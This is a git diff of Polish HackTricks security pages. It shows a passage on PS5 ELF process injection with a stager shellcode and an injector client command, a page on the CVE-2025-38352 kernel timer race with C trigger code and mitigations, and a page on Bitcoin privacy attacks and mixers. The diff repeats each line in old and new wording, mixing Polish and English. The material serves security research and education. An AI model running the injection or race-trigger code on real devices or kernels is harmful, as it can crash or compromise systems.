Minimalny stager wewnątrz celu tworzy nowy pthread, który uruchamia main ELF-a, a następnie wywołuje int3, aby zasygnalizować injectorowi, żeby się odłączył:
```c
int __attribute__((section(".stager_shellcode$1"))) stager(SCEFunctions* functions){
pthread_t thread;
functions->pthread_create_ptr(&thread, 0,
(void*(*)(void*))functions->elf_main, functions->payload_args);
asm("int3");
return 0;
}
```
- Wskaźniki SCEFunctions/payload_args są dostarczane przez loader/SDK glue.
- Po breakpoint i detach payload kontynuuje w osobnym thread.
## Pełny pipeline (implementacja referencyjna dla PS5)
Działająca implementacja jest dostarczana jako mały TCP injector server oraz skrypt klienta:
- NineS server nasłuchuje na TCP 9033 i odbiera nagłówek zawierający nazwę procesu docelowego, po którym następuje ELF image:
```c
typedef struct __injector_data_t{
char proc_name[MAX_PROC_NAME];
Elf64_Ehdr elf_header;
} injector_data_t;
```
- Użycie klienta Python:
```bash
python3 ./send_injection_elf.py SceShellUI hello_world.elf <PS5_IP>
```
Przykład Hello-world payload (loguje do klog):
```c
#include <stdio.h>
#include <unistd.h>
#include <ps5/klog.h>
int main(){
klog_printf("Hello from PID %d\n", getpid());
return 0;
}
```
## Praktyczne uwagi
- Offsety i stałe (allproc, ucred authority offset, vm_map layout, ptrace/mdbg details) są specyficzne dla firmware i muszą być aktualizowane dla każdej wersji.
- Zabezpieczenia hypervisora wymuszają zapisy do jądra wyłącznie jako dane; nie próbuj patchować CR0.WP lub CR4.SMEP.
- Pamięć JIT jest alternatywą: niektóre procesy udostępniają PS5 JIT APIs do alokacji wykonywalnych stron. Zmiana ochrony vm_map usuwa konieczność polegania na sztuczkach JIT/mirroring.
- Utrzymuj mechanizm zapisu/przywracania rejestrów odporny na błędy; w razie niepowodzenia możesz doprowadzić do deadlock lub crash targetu.
## Publiczne narzędzia
- PS5 SDK (dynamic linking, kernel R/W wrappers, vm_map helpers): https://github.com/ps5-payload-dev/sdk
- ELF loader: https://github.com/ps5-payload-dev/elfldr
- Injector server: https://github.com/buzzer-re/NineS/
- Utilities/vm_map helpers: https://github.com/buzzer-re/playstation_research_utils
- Related projects: https://github.com/OpenOrbis/mira-project, https://github.com/ps5-payload-dev/gdbsrv
## Źródła
- [Usermode ELF injection on the PlayStation 5](https://reversing.codes/posts/PlayStation-5-ELF-Injection/)
- [ps5-payload-dev/sdk](https://github.com/ps5-payload-dev/sdk)
- [ps5-payload-dev/elfldr](https://github.com/ps5-payload-dev/elfldr)
- [buzzer-re/NineS](https://github.com/buzzer-re/NineS/)
- [playstation_research_utils](https://github.com/buzzer-re/playstation_research_utils)
- [Mira](https://github.com/OpenOrbis/mira-project)
- [gdbsrv](https://github.com/ps5-payload-dev/gdbsrv)
- [FreeBSD klog reference](https://lists.freebsd.org/pipermail/freebsd-questions/2006-October/134233.html)
{{#include ../banners/hacktricks-training.md}}

70
src/binary-exploitation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md
View File

@ -1,19 +1,19 @@
# POSIX CPU Timers TOCTOU race (CVE-2025-38352)
{{#include ../../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
Ta strona dokumentuje warunek wyścigu TOCTOU w Linux/Android POSIX CPU timers, który może uszkodzić stan timera i spowodować awarię kernela, a w pewnych okolicznościach dać się skierować ku privilege escalation.
Ta strona opisuje błąd TOCTOU w Linux/Android POSIX CPU timers, który może uszkodzić stan timera i spowodować awarię jądra, a w niektórych okolicznościach może zostać wykorzystany do eskalacji uprawnień.
- Dotknięty komponent: kernel/time/posix-cpu-timers.c
- Primitive: wyścig między wygaśnięciem a usunięciem przy zakończeniu zadania
- Wrażliwe na konfigurację: CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n (ścieżka wygaśnięcia w kontekście IRQ)
- Affected component: kernel/time/posix-cpu-timers.c
- Primitive: wyścig między expiry a deletion podczas zakończenia zadania
- Config sensitive: CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n (IRQ-context expiry path)
Szybkie przypomnienie wewnętrzności (istotne dla eksploatacji)
Krótkie przypomnienie wewnętrzne (istotne dla exploitation)
- Trzy zegary CPU odpowiadają za rozliczanie timerów przez cpu_clock_sample():
- CPUCLOCK_PROF: utime + stime
- CPUCLOCK_VIRT: tylko utime
- CPUCLOCK_VIRT: utime only
- CPUCLOCK_SCHED: task_sched_runtime()
- Tworzenie timera wiąże timer z task/pid i inicjalizuje timerqueue nodes:
- Tworzenie timera powiązuje timer z task/pid i inicjalizuje węzły timerqueue:
```c
static int posix_cpu_timer_create(struct k_itimer *new_timer) {
struct pid *pid;
@ -27,7 +27,7 @@ rcu_read_unlock();
return 0;
}
```
- Uzbrajanie wstawia do per-base timerqueue i może zaktualizować next-expiry cache:
- Uzbrajanie wstawia wpis do per-base timerqueue i może zaktualizować pamięć podręczną następnego wygaśnięcia:
```c
static void arm_timer(struct k_itimer *timer, struct task_struct *p) {
struct posix_cputimer_base *base = timer_base(timer, p);
@ -37,7 +37,7 @@ if (!cpu_timer_enqueue(&base->tqhead, ctmr)) return;
if (newexp < base->nextevt) base->nextevt = newexp;
}
```
Szybka ścieżka unika kosztownego przetwarzania, chyba że zbuforowane czasy wygaśnięcia wskazują na możliwe wyzwolenie:
- Szybka ścieżka unika kosztownego przetwarzania, chyba że zbuforowane czasy wygaśnięcia wskazują na możliwe wyzwolenie:
```c
static inline bool fastpath_timer_check(struct task_struct *tsk) {
struct posix_cputimers *pct = &tsk->posix_cputimers;
@ -50,7 +50,7 @@ return true;
return false;
}
```
- Wygaśnięcie zbiera wygasłe timery, oznacza je jako uruchomione, usuwa je z kolejki; faktyczne dostarczenie jest odroczone:
- Wygaśnięcie zbiera wygasłe timery, oznacza je jako gotowe do wykonania, usuwa je z kolejki; faktyczne dostarczenie jest odroczone:
```c
#define MAX_COLLECTED 20
static u64 collect_timerqueue(struct timerqueue_head *head,
@ -68,8 +68,8 @@ list_add_tail(&ctmr->elist, firing);
return U64_MAX;
}
```
Dwa tryby przetwarzania wygaśnięć
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: wygaśnięcie jest odroczone przez task_work na zadaniu docelowym
Dwa tryby obsługi wygaśnięć
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: wygaśnięcie jest odroczone za pomocą task_work na docelowym zadaniu
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: wygaśnięcie obsługiwane bezpośrednio w kontekście IRQ
```c
void run_posix_cpu_timers(void) {
@ -90,7 +90,7 @@ lockdep_posixtimer_exit();
}
#endif
```
W ścieżce kontekstu IRQ lista firing jest przetwarzana poza sighand.
W ścieżce IRQ-context firing list jest przetwarzana poza sighand
```c
static void handle_posix_cpu_timers(struct task_struct *tsk) {
struct k_itimer *timer, *next; unsigned long flags, start;
@ -138,20 +138,20 @@ Fix (Android common kernel) and rationale
if (tsk->exit_state)
return;
```
- To uniemożliwia wejście do handle_posix_cpu_timers() dla zadań wychodzących, eliminując okno, w którym posix_cpu_timer_del() mógłby przegapić it.cpu.firing i spowodować wyścig z przetwarzaniem wygaśnięcia.
- To zapobiega wejściu do handle_posix_cpu_timers() dla kończących się zadań, eliminując okno, w którym posix_cpu_timer_del() mógłby pominąć it.cpu.firing i wejść w wyścig z przetwarzaniem wygaśnięcia.
Impact
- Uszkodzenie pamięci jądra w strukturach timerów podczas równoczesnego wygaśnięcia/usuwania może prowadzić do natychmiastowych awarii (DoS) i stanowi silny prymityw do eskalacji uprawnień z powodu możliwości dowolnej manipulacji stanem jądra.
Wpływ
- Uszkodzenie pamięci jądra struktur timerów podczas równoczesnego expiry/deletion może prowadzić do natychmiastowych awarii (DoS) i stanowi silny prymityw umożliwiający eskalację uprawnień z powodu możliwości dowolnej manipulacji stanem jądra.
Triggering the bug (safe, reproducible conditions)
Wywoływanie błędu (bezpieczne, odtwarzalne warunki)
Build/config
- Upewnij się, że CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n i użyj jądra bez poprawki gate'ującej exit_state.
- Upewnij się, że CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n i użyj jądra bez exit_state gating fix.
Runtime strategy
- Wyceluj w wątek, który ma zaraz zakończyć działanie, i przypnij do niego timer CPU (per-thread lub process-wide):
- Dla per-thread: timer_create(CLOCK_THREAD_CPUTIME_ID, ...)
- Dla process-wide: timer_create(CLOCK_PROCESS_CPUTIME_ID, ...)
- Uzbrój z bardzo krótkim początkowym czasem wygaśnięcia i małym interwałem, aby zmaksymalizować liczbę wejść w ścieżkę IRQ:
- Wybierz wątek, który zaraz zakończy działanie, i przypisz do niego CPU timer (per-thread or process-wide clock):
- For per-thread: timer_create(CLOCK_THREAD_CPUTIME_ID, ...)
- For process-wide: timer_create(CLOCK_PROCESS_CPUTIME_ID, ...)
- Ustaw bardzo krótki początkowy czas wygaśnięcia i mały interwał, aby zmaksymalizować wejścia w ścieżkę IRQ:
```c
static timer_t t;
static void setup_cpu_timer(void) {
@ -171,25 +171,25 @@ void *deleter(void *arg) {
for (;;) (void)timer_delete(t); // hammer delete in a loop
}
```
- Race amplifiers: wysoka częstotliwość ticków schedulera, obciążenie CPU, powtarzające się cykle zakończeń i ponownego tworzenia wątków. Awaria zwykle objawia się, gdy posix_cpu_timer_del() pomija wykrycie pola firing z powodu nieudanego wyszukiwania/blokowania tasku tuż po unlock_task_sighand().
- Race amplifiers: wysoki współczynnik ticków planera, obciążenie CPU, powtarzające się cykle exit/re-create wątków. Awaria zwykle objawia się, gdy posix_cpu_timer_del() pomija wykrycie firing z powodu nieudanego task lookup/locking tuż po unlock_task_sighand().
Detection and hardening
- Mitigacja: zastosuj exit_state guard; w miarę możliwości włącz CONFIG_POSIX_CPU_TIMERS_TASK_WORK.
- Obserwowalność: dodaj tracepoints/WARN_ONCE wokół unlock_task_sighand()/posix_cpu_timer_del(); wyzwalaj alert, gdy it.cpu.firing==1 zostanie zaobserwowane razem z nieudanym cpu_timer_task_rcu()/lock_task_sighand(); monitoruj niespójności timerqueue podczas wychodzenia tasku.
Wykrywanie i utwardzanie
- Środki zaradcze: zastosować exit_state guard; preferować włączenie CONFIG_POSIX_CPU_TIMERS_TASK_WORK, gdy to możliwe.
- Obserwowalność: dodać tracepoints/WARN_ONCE wokół unlock_task_sighand()/posix_cpu_timer_del(); generować alert, gdy it.cpu.firing==1 jest obserwowane razem z nieudanym cpu_timer_task_rcu()/lock_task_sighand(); monitorować niespójności timerqueue wokół exit zadania.
Audit hotspots (for reviewers)
Obszary audytu (dla recenzentów)
- update_process_times() → run_posix_cpu_timers() (IRQ)
- __run_posix_cpu_timers() selection (TASK_WORK vs IRQ path)
- collect_timerqueue(): sets ctmr->firing and moves nodes
- handle_posix_cpu_timers(): drops sighand before firing loop
- posix_cpu_timer_del(): relies on it.cpu.firing to detect in-flight expiry; this check is skipped when task lookup/lock fails during exit/reap
- collect_timerqueue(): ustawia ctmr->firing i przesuwa węzły
- handle_posix_cpu_timers(): zwalnia sighand przed pętlą firing
- posix_cpu_timer_del(): polega na it.cpu.firing do wykrycia wygaśnięcia w locie; ta kontrola jest pomijana, gdy task lookup/lock nie powiedzie się podczas exit/reap
Notes for exploitation research
- The disclosed behavior is a reliable kernel crash primitive; turning it into privilege escalation typically needs an additional controllable overlap (object lifetime or write-what-where influence) beyond the scope of this summary. Treat any PoC as potentially destabilizing and run only in emulators/VMs.
Uwagi dla badań nad eksploatacją
- Opisane zachowanie jest niezawodnym prymitywem powodującym awarię jądra; przekształcenie go w privilege escalation zwykle wymaga dodatkowego, kontrolowalnego overlapu (object lifetime lub write-what-where influence) wykraczającego poza zakres tego podsumowania. Traktuj każde PoC jako potencjalnie destabilizujące i uruchamiaj wyłącznie w emulatorach/VMs.
## Referencje
## References
- [Race Against Time in the Kernels Clockwork (StreyPaws)](https://streypaws.github.io/posts/Race-Against-Time-in-the-Kernel-Clockwork/)
- [Android security bulletin September 2025](https://source.android.com/docs/security/bulletin/2025-09-01)
- [Android common kernel patch commit 157f357d50b5…](https://android.googlesource.com/kernel/common/+/157f357d50b5038e5eaad0b2b438f923ac40afeb%5E%21/#F0)
{{#include ../../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

130
src/blockchain/blockchain-and-crypto-currencies/README.md
View File

@ -1,77 +1,77 @@
# Blockchain i Kryptowaluty
# Blockchain and Crypto-Currencies
{{#include ../../banners/hacktricks-training.md}}
## Podstawowe pojęcia
## Basic Concepts
- **Smart Contracts** są definiowane jako programy, które wykonują się na blockchainie, gdy spełnione są określone warunki, automatyzując realizację umów bez pośredników.
- **Decentralized Applications (dApps)** opierają się na smart contracts, oferując przyjazny dla użytkownika front-end oraz przejrzysty, audytowalny back-end.
- **Tokens & Coins** rozróżniają się tym, że coins służą jako cyfrowe pieniądze, podczas gdy tokens reprezentują wartość lub własność w określonych kontekstach.
- **Smart Contracts** są definiowane jako programy wykonywane na blockchainie, gdy spełnione są określone warunki, automatyzując wykonanie umów bez pośredników.
- **Decentralized Applications (dApps)** bazują na smart contracts, posiadając przyjazny dla użytkownika frontend oraz przejrzysty, audytowalny backend.
- **Tokens & Coins** rozróżniają się tym, że coins pełnią rolę cyfrowych pieniędzy, podczas gdy tokens reprezentują wartość lub własność w określonych kontekstach.
- **Utility Tokens** dają dostęp do usług, a **Security Tokens** oznaczają własność aktywów.
- **DeFi** oznacza Decentralized Finance, oferując usługi finansowe bez centralnych władz.
- **DeFi** oznacza Decentralized Finance, oferujące usługi finansowe bez centralnych organów.
- **DEX** i **DAOs** odnoszą się odpowiednio do Decentralized Exchange Platforms i Decentralized Autonomous Organizations.
## Mechanizmy konsensusu
## Consensus Mechanisms
Mechanizmy konsensusu zapewniają bezpieczną i uzgodnioną weryfikację transakcji w blockchainie:
Mechanizmy konsensusu zapewniają bezpieczną i zgodną walidację transakcji na blockchainie:
- **Proof of Work (PoW)** opiera się na mocy obliczeniowej do weryfikacji transakcji.
- **Proof of Stake (PoS)** wymaga, aby walidatorzy posiadali określoną ilość tokenów, redukując zużycie energii w porównaniu do PoW.
- **Proof of Stake (PoS)** wymaga od walidatorów posiadania określonej ilości tokenów, zmniejszając zużycie energii w porównaniu do PoW.
## Podstawy Bitcoina
## Bitcoin Essentials
### Transakcje
### Transactions
Transakcje Bitcoin polegają na przesyłaniu środków między adresami. Transakcje są weryfikowane za pomocą podpisów cyfrowych, co zapewnia, że tylko właściciel klucza prywatnego może inicjować przelewy.
Transakcje Bitcoin polegają na przesyłaniu środków między adresami. Transakcje są walidowane za pomocą podpisów cyfrowych, co zapewnia, że tylko właściciel klucza prywatnego może inicjować transfery.
#### Kluczowe elementy:
#### Key Components:
- **Multisignature Transactions** wymagają wielu podpisów do autoryzacji transakcji.
- Transakcje składają się z **inputs** (źródło środków), **outputs** (miejsce docelowe), **fees** (płaconych górnikom) i **scripts** (zasady transakcji).
- Transakcje składają się z **inputs** (źródło środków), **outputs** (miejsce docelowe), **fees** (płacone górnikom) i **scripts** (reguły transakcji).
### Lightning Network
Ma na celu poprawę skalowalności Bitcoina poprzez umożliwienie wielu transakcji wewnątrz kanału, wysyłając do blockchaina jedynie stan końcowy.
Ma na celu zwiększenie skalowalności Bitcoina przez umożliwienie wielu transakcji w ramach kanału, przy jednoczesnym raportowaniu do blockchaina tylko stanu końcowego.
## Zagadnienia prywatności Bitcoina
## Bitcoin Privacy Concerns
Ataki na prywatność, takie jak **Common Input Ownership** i **UTXO Change Address Detection**, wykorzystują wzorce transakcji. Strategie takie jak **Mixers** i **CoinJoin** zwiększają anonimowość, zaciemniając powiązania transakcji między użytkownikami.
Ataki na prywatność, takie jak **Common Input Ownership** i **UTXO Change Address Detection**, wykorzystują wzorce transakcji. Strategie takie jak **Mixers** i **CoinJoin** poprawiają anonimowość przez zaciemnianie powiązań transakcji między użytkownikami.
## Pozyskiwanie Bitcoinów anonimowo
## Acquiring Bitcoins Anonymously
Metody obejmują transakcje za gotówkę, mining oraz użycie mixers. **CoinJoin** miesza wiele transakcji, aby utrudnić śledzenie, podczas gdy **PayJoin** maskuje CoinJoins jako zwykłe transakcje dla zwiększenia prywatności.
Metody obejmują transakcje gotówkowe, mining oraz użycie mixerów. **CoinJoin** miesza wiele transakcji, aby utrudnić śledzenie, podczas gdy **PayJoin** udaje zwykłe transakcje, żeby dodatkowo ukryć CoinJoins.
# Ataki na prywatność Bitcoina
# Bitcoin Privacy Atacks
# Podsumowanie ataków na prywatność Bitcoina
# Summary of Bitcoin Privacy Attacks
W świecie Bitcoina prywatność transakcji i anonimowość użytkowników często budzą obawy. Oto uproszczony przegląd kilku powszechnych metod, za pomocą których atakujący mogą naruszyć prywatność Bitcoina.
W świecie Bitcoina prywatność transakcji i anonimowość użytkowników są często przedmiotem obaw. Oto uproszczony przegląd kilku powszechnych metod, za pomocą których atakujący mogą naruszyć prywatność użytkowników Bitcoina.
## **Common Input Ownership Assumption**
Zwykle rzadko zdarza się, by inputs od różnych użytkowników były łączone w jednej transakcji ze względu na złożoność tego procesu. Dlatego **dwa adresy input w tej samej transakcji często uznaje się za należące do tego samego właściciela**.
Rzadko się zdarza, by inputs od różnych użytkowników były łączone w jednej transakcji ze względu na złożoność procesu. W związku z tym **dwa adresy źródłowe w tej samej transakcji są często uznawane za należące do tego samego właściciela**.
## **UTXO Change Address Detection**
UTXO, czyli **Unspent Transaction Output**, musi zostać w całości wykorzystany w transakcji. Jeśli tylko część zostanie wysłana na inny adres, reszta trafia na nowy change address. Obserwatorzy mogą założyć, że ten nowy adres należy do nadawcy, co narusza prywatność.
UTXO, czyli Unspent Transaction Output, musi zostać w całości zużyte w transakcji. Jeśli tylko jej część zostanie wysłana na inny adres, pozostała część trafia na nowy adres change. Obserwatorzy mogą przypuszczać, że ten nowy adres należy do nadawcy, co narusza prywatność.
### Przykład
### Example
Aby to złagodzić, usługi mixingowe lub korzystanie z wielu adresów mogą pomóc zaciemnić własność.
Aby to złagodzić, usługi mieszające lub używanie wielu adresów może pomóc w zaciemnieniu własności.
## **Social Networks & Forums Exposure**
Użytkownicy czasami udostępniają swoje adresy Bitcoin online, co sprawia, że **łatwo jest powiązać adres z jego właścicielem**.
Użytkownicy czasami udostępniają swoje adresy Bitcoin online, co sprawia, że **łatwo powiązać adres z jego właścicielem**.
## **Transaction Graph Analysis**
Transakcje można wizualizować jako grafy, ujawniając potencjalne powiązania między użytkownikami na podstawie przepływu środków.
Transakcje można zwizualizować jako grafy, ujawniając potencjalne powiązania między użytkownikami na podstawie przepływu środków.
## **Unnecessary Input Heuristic (Optimal Change Heuristic)**
Ta heurystyka opiera się na analizie transakcji z wieloma inputs i outputs w celu odgadnięcia, który output jest change zwracającym się do nadawcy.
Ta heurystyka opiera się na analizie transakcji z wieloma inputs i outputs, aby odgadnąć, który output jest change zwracanym do nadawcy.
### Przykład
### Example
```bash
2 btc --> 4 btc
3 btc 1 btc
@ -80,98 +80,106 @@ If adding more inputs makes the change output larger than any single input, it c
## **Forced Address Reuse**
Atakujący mogą wysyłać małe kwoty na wcześniej używane adresy, licząc że odbiorca połączy je z innymi inputs w przyszłych transakcjach, w ten sposób łącząc adresy.
Atakujący mogą wysyłać niewielkie kwoty na wcześniej używane adresy, mając nadzieję, że odbiorca połączy je z innymi inputs w przyszłych transakcjach, przez co adresy zostaną powiązane.
### Correct Wallet Behavior
Wallets powinny unikać używania coins otrzymanych na już użytych, pustych adresach, aby zapobiec temu privacy leak.
Portfele powinny unikać używania coinów otrzymanych na już użyte, puste adresy, aby zapobiec temu privacy leak.
## **Other Blockchain Analysis Techniques**
- **Exact Payment Amounts:** Transakcje bez change są prawdopodobnie między dwoma adresami należącymi do tego samego użytkownika.
- **Round Numbers:** Zaokrąglona kwota w transakcji sugeruje płatność, a niezaokrąglone wyjście prawdopodobnie jest change.
- **Round Numbers:** Zaokrąglona kwota w transakcji sugeruje, że to płatność, a niezaokrąglone wyjście prawdopodobnie jest change.
- **Wallet Fingerprinting:** Różne wallets mają unikalne wzorce tworzenia transakcji, co pozwala analitykom zidentyfikować używane oprogramowanie i potencjalnie change address.
- **Amount & Timing Correlations:** Ujawnienie czasu lub kwoty transakcji może uczynić transakcje śledzalnymi.
- **Amount & Timing Correlations:** Ujawnienie czasu lub kwot transakcji może umożliwić ich wyśledzenie.
## **Traffic Analysis**
Monitorując network traffic, attackers mogą potencjalnie powiązać transakcje lub bloki z adresami IP, kompromitując prywatność użytkowników. Jest to szczególnie prawdziwe, jeśli podmiot obsługuje wiele Bitcoin nodes, zwiększając swoją zdolność do monitorowania transakcji.
Monitorując ruch sieciowy, atakujący mogą potencjalnie powiązać transakcje lub bloki z adresami IP, kompromitując prywatność użytkownika. Szczególnie prawdziwe, jeśli podmiot obsługuje wiele węzłów Bitcoin, co zwiększa jego zdolność do monitorowania transakcji.
## More
Aby uzyskać pełną listę ataków na prywatność i obrony, odwiedź [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy).
For a comprehensive list of privacy attacks and defenses, visit [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy).
# Anonymous Bitcoin Transactions
## Ways to Get Bitcoins Anonymously
- **Cash Transactions**: Pozyskanie bitcoin za gotówkę.
- **Cash Transactions**: Pozyskanie bitcoin przez użycie gotówki.
- **Cash Alternatives**: Kupowanie gift cards i wymiana ich online na bitcoin.
- **Mining**: Najbardziej prywatna metoda zdobywania bitcoinów to mining, szczególnie gdy wykonywana solo, ponieważ mining pools mogą znać IP kopacza. [Mining Pools Information](https://en.bitcoin.it/wiki/Pooled_mining)
- **Theft**: Teoretycznie kradzież bitcoinów mogłaby być metodą anonimowego pozyskania, choć jest to nielegalne i niezalecane.
- **Mining**: Najbardziej prywatną metodą zdobywania bitcoinów jest mining, szczególnie w trybie solo, ponieważ mining pools mogą znać adres IP górnika. [Mining Pools Information](https://en.bitcoin.it/wiki/Pooled_mining)
- **Theft**: Teoretycznie kradzież bitcoinów mogłaby być inną metodą ich anonimowego pozyskania, chociaż jest to nielegalne i niezalecane.
## Mixing Services
Używając mixing service, użytkownik może wysłać bitcoins i otrzymać inne bitcoins w zamian, co utrudnia śledzenie pierwotnego właściciela. Wymaga to jednak zaufania do usługi, że nie będzie przechowywać logów i że faktycznie zwróci bitcoins. Alternatywne opcje mixingowe obejmują Bitcoin casinos.
Korzystając z mixing service, użytkownik może **send bitcoins** i otrzymać **different bitcoins in return**, co utrudnia wyśledzenie pierwotnego właściciela. Jednak wymaga to zaufania do usługi, że nie prowadzi logów i rzeczywiście zwróci bitcoiny. Alternatywami mixingu są kasyna Bitcoin.
## CoinJoin
CoinJoin łączy wiele transakcji od różnych użytkowników w jedną, komplikując proces dopasowywania inputs do outputs. Pomimo skuteczności, transakcje z unikalnymi rozmiarami inputów i outputów nadal mogą być potencjalnie śledzone.
CoinJoin łączy wiele transakcji od różnych użytkowników w jedną, utrudniając dopasowanie inputs do outputs. Mimo skuteczności, transakcje o unikalnych rozmiarach inputs i outputs wciąż mogą być śledzone.
Example transactions that may have used CoinJoin include `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
Przykładowe transakcje, które mogły używać CoinJoin, to `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` i `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
For more information, visit [CoinJoin](https://coinjoin.io/en). For a similar service on Ethereum, check out [Tornado Cash](https://tornado.cash), which anonymizes transactions with funds from miners.
## PayJoin
A variant of CoinJoin, **PayJoin** (or P2EP), disguises the transaction among two parties (e.g., a customer and a merchant) as a regular transaction, without the distinctive equal outputs characteristic of CoinJoin. This makes it extremely hard to detect and could invalidate the common-input-ownership heuristic used by transaction surveillance entities.
A variant of CoinJoin, **PayJoin** (or P2EP), maskuje transakcję między dwiema stronami (np. klientem i sprzedawcą) jako zwykłą transakcję, bez charakterystycznych równych outputs typowych dla CoinJoin. To sprawia, że jest ona niezwykle trudna do wykrycia i może unieważnić common-input-ownership heuristic używaną przez podmioty nadzorujące transakcje.
```plaintext
2 btc --> 3 btc
5 btc 4 btc
```
Transakcje takie jak powyższa mogą być PayJoin, zwiększając prywatność przy pozostawaniu nie do odróżnienia od standardowych transakcji bitcoin.
Transakcje takie jak powyższe mogą być PayJoin, zwiększając prywatność, jednocześnie pozostając nieodróżnialne od standardowych transakcji bitcoin.
**Wykorzystanie PayJoin może znacząco zakłócić tradycyjne metody nadzoru**, co czyni go obiecującym rozwiązaniem w dążeniu do prywatności transakcyjnej.
**Wykorzystanie PayJoin może znacząco zakłócić tradycyjne metody nadzoru**, czyniąc to obiecującym rozwiązaniem w dążeniu do prywatności transakcyjnej.
# Najlepsze praktyki prywatności w kryptowalutach
# Najlepsze praktyki dotyczące prywatności w kryptowalutach
## **Techniki synchronizacji portfeli**
Aby zachować prywatność i bezpieczeństwo, synchronizacja portfeli z blockchainem jest kluczowa. Wyróżniają się dwie metody:
Aby utrzymać prywatność i bezpieczeństwo, synchronizacja portfeli z blockchainem jest kluczowa. Wyróżniają się dwie metody:
- **Full node**: Poprzez pobranie całego blockchainu, Full node zapewnia maksymalną prywatność. Wszystkie kiedykolwiek wykonane transakcje są przechowywane lokalnie, przez co przeciwnicy nie są w stanie ustalić, które transakcje lub adresy interesują użytkownika.
- **Client-side block filtering**: Ta metoda polega na tworzeniu filtrów dla każdego bloku w blockchainie, pozwalając portfelom identyfikować istotne transakcje bez ujawniania konkretnych zainteresowań obserwatorom sieci. Lightweight wallets pobierają te filtry, pobierając pełne bloki tylko wtedy, gdy zostanie znalezione dopasowanie do adresów użytkownika.
- **Full node**: Pobierając cały blockchain, full node zapewnia maksymalną prywatność. Wszystkie kiedykolwiek dokonane transakcje są przechowywane lokalnie, co uniemożliwia przeciwnikom ustalenie, które transakcje lub adresy interesują użytkownika.
- **Client-side block filtering**: Ta metoda polega na tworzeniu filtrów dla każdego bloku w blockchainie, co pozwala portfelom identyfikować istotne transakcje bez ujawniania konkretnych zainteresowań obserwatorom sieci. Lightweight wallets pobierają te filtry, pobierając pełne bloki tylko wtedy, gdy znajdzie się dopasowanie do adresów użytkownika.
## **Wykorzystanie Tor dla anonimowości**
## **Wykorzystanie Tora dla anonimowości**
Ponieważ Bitcoin działa w sieci peer-to-peer, zaleca się używanie Tor do maskowania adresu IP, co zwiększa prywatność podczas interakcji z siecią.
Ponieważ Bitcoin działa w sieci peer-to-peer, zaleca się korzystanie z Tora, aby zamaskować swój adres IP, zwiększając prywatność podczas interakcji z siecią.
## **Zapobieganie ponownemu użyciu adresu**
## **Zapobieganie ponownemu użyciu adresów**
Aby chronić prywatność, ważne jest używanie nowego adresu przy każdej transakcji. Ponowne użycie adresów może zagrozić prywatności poprzez powiązanie transakcji z tym samym podmiotem. Nowoczesne portfele zniechęcają do ponownego używania adresów poprzez swój projekt.
Aby chronić prywatność, ważne jest używanie nowego adresu dla każdej transakcji. Ponowne użycie adresów może narazić prywatność przez powiązanie transakcji z tą samą jednostką. Nowoczesne portfele zniechęcają do ponownego użycia adresów przez swój projekt.
## **Strategie prywatności transakcji**
- **Multiple transactions**: Podzielenie płatności na kilka transakcji może ukryć kwotę transakcji, uniemożliwiając ataki na prywatność.
- **Change avoidance**: Wybieranie transakcji, które nie wymagają wyjść z resztą (change outputs), zwiększa prywatność poprzez zakłócanie metod wykrywania reszty.
- **Multiple change outputs**: Jeśli uniknięcie reszty nie jest możliwe, wygenerowanie wielu change outputs może i tak poprawić prywatność.
- **Multiple transactions**: Podzielenie płatności na kilka transakcji może zniekształcić widoczność kwoty transakcji, uniemożliwiając ataki na prywatność.
- **Change avoidance**: Wybieranie transakcji, które nie wymagają change outputs, zwiększa prywatność przez zakłócanie metod wykrywania change.
- **Multiple change outputs**: Jeśli uniknięcie change nie jest możliwe, wygenerowanie wielu change outputs może nadal poprawić prywatność.
# **Monero: Latarnia anonimowości**
# **Monero: bastion anonimowości**
Monero odpowiada na potrzebę absolutnej anonimowości w transakcjach cyfrowych, ustanawiając wysoki standard prywatności.
# **Ethereum: Gas i transakcje**
# **Ethereum: gas i transakcje**
## **Zrozumienie Gas**
## **Zrozumienie gas**
Gas mierzy wysiłek obliczeniowy potrzebny do wykonania operacji na Ethereum, wyceniany w **gwei**. Na przykład transakcja kosztująca 2,310,000 gwei (czyli 0.00231 ETH) obejmuje limit gas, opłatę bazową i tip jako zachętę dla górników. Użytkownicy mogą ustawić maksymalną opłatę, aby nie przepłacić — nadpłata jest zwracana.
Gas mierzy nakład obliczeniowy potrzebny do wykonania operacji na Ethereum, wyceniany w **gwei**. Na przykład transakcja kosztująca 2,310,000 gwei (czyli 0.00231 ETH) obejmuje limit gas i opłatę bazową, z napiwkiem dla górników. Użytkownicy mogą ustawić maksymalną opłatę, aby uniknąć przepłacenia; nadpłata jest zwracana.
## **Wykonywanie transakcji**
Transakcje w Ethereum obejmują nadawcę i odbiorcę, którymi mogą być zarówno adresy użytkowników, jak i smart contract. Wymagają opłaty i muszą zostać potwierdzone przez górników. Podstawowe informacje w transakcji to odbiorca, podpis nadawcy, wartość, opcjonalne dane, limit gas i opłaty. Co istotne, adres nadawcy jest wyprowadzany z podpisu, co eliminuje potrzebę umieszczania go w danych transakcji.
Transakcje w Ethereum obejmują nadawcę i odbiorcę, którymi mogą być zarówno adresy użytkowników, jak i smart contractów. Wymagają opłaty i muszą zostać zamnięte (mined). Istotne informacje w transakcji to odbiorca, podpis nadawcy, wartość, opcjonalne dane, limit gas i opłaty. Warto zauważyć, że adres nadawcy jest wyprowadzany z podpisu, co eliminuje konieczność umieszczania go w danych transakcji.
